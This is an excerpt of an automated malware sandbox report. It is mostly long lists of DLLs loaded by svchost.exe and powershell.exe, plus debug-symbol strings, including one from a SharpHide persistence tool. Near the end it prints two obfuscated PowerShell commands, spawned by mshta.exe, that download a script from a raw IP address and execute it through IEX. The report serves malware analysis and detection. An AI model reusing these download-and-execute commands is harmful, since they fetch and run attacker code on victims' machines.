                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdb_ source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdbT source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbesv source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1 source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbessA source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbK source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: #.dll.pdb source: powershell.exe, 00000005.00000002.2129677364.0000024B803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2321469926.0000024BF74D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D0803CA000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbq source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdban0K source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb?"#v source: powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbX source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbV source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdbb\ source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000007.00000002.2400988982.0000022DFF04E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7BA6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbSt^K source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdbE source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdblA source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7BA6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbl source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb- source: powershell.exe, 00000007.00000002.2407828166.0000022DFF693000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb#{& source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000007.00000002.2407828166.0000022DFF693000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbS{ source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb?{ source: powershell.exe, 00000007.00000002.2400988982.0000022DFF04E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \SharpHide-master\SharpHide\obj\Debug\SharpHide.pdb source: powershell.exe, 00000005.00000002.2129677364.0000024B803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B804A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2123644838.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb5 source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0EE000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
